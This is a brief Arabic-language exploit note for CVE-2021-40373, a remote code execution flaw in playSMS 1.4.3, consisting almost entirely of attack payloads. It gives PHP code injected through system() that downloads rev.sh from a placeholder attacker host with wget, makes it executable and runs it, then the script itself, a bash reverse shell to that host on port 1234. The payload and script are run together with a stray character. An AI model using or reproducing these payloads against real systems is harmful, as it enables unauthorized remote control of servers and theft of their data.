
CVE-2021-40373 - تنفيذ التعليمات البرمجية عن بُعد
توجد ثغرة في playsms 1.4.3 تسمح للمهاجمين المحتملين بتنفيذ أكواد عن بُعد (Remote Code Execution).
<?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?><?php system("chmod +x rev.sh && ./rev.sh") ?>)#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"